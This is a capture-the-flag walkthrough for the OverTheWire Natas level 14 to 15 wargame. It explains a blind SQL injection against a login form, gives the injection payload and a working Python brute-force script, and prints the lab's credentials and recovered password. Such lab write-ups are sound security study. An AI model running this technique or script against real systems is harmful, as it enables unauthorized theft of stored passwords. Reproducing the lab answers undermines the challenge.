OverTheWire Natas Level 14 → 15 tutorial!!

Login

URL: http://natas15.natas.labs.overthewire.org
Credentials: natas15:SdqIqBsFcz3yotlNYErZSZwblkm0lrvx

# Using curl (optional):
curl -u natas15:SdqIqBsFcz3yotlNYErZSZwblkm0lrvx http://natas15.natas.labs.overthewire.org/

Task

Unlike level 14, this login form does not leak the password directly. The only feedback we get is:

• “This user exists.”
• “This user doesn’t exist.”

That means we’re dealing with a blind SQL injection.

A little bit of Theory

Relevant snippet:

$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";

Observations:

• The query only checks for username.
• No password field is used here.
• If we inject SQL, the page will only tell us whether the condition is true or false.

We can exploit this by asking yes/no questions such as:

SELECT * FROM users WHERE username="natas16" AND password LIKE BINARY "a%"

If the password really starts with a, the query matches → response: This user exists. Otherwise → This user doesn’t exist.

By brute forcing character by character, we can reconstruct the whole password.

Solution

Step 1: Build a payload

We inject into username with:

natas16" AND password LIKE BINARY "a%" #

Step 2: Automate with Python

import requests
import sys
from string import ascii_lowercase, ascii_uppercase, digits

url = "http://natas15.natas.labs.overthewire.org/"
charset = ascii_lowercase + ascii_uppercase + digits
sqli = 'natas16" AND password LIKE BINARY "'

s = requests.Session()
s.auth = ('natas15', 'SdqIqBsFcz3yotlNYErZSZwblkm0lrvx')

password = ""
while len(password) < 32:
    for char in charset:
        r = s.post(url, data={"username": sqli + password + char + "%"})
        if "This user exists" in r.text:
            sys.stdout.write(char)
            sys.stdout.flush()
            password += char
            break

• The script loops over the charset.
• For each guess, it asks: Does the password start with my guess so far?
• If the response is This user exists, we keep the char.
• Repeat until we recover all 32 chars.

Password

hPkjKYviLQctEW33QmuXL6eDVfMW4sGo

Troubleshooting

• Script prints nothing? → Double-check your session credentials.
• Always “user doesn’t exist”? → Make sure your injection ends with % and quotes are balanced.
• Too slow? → Try a reduced charset first (e.g., only abcdef0123456789).

Great job 🎉 You just executed a blind SQL injection to leak the entire password for natas16.

Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨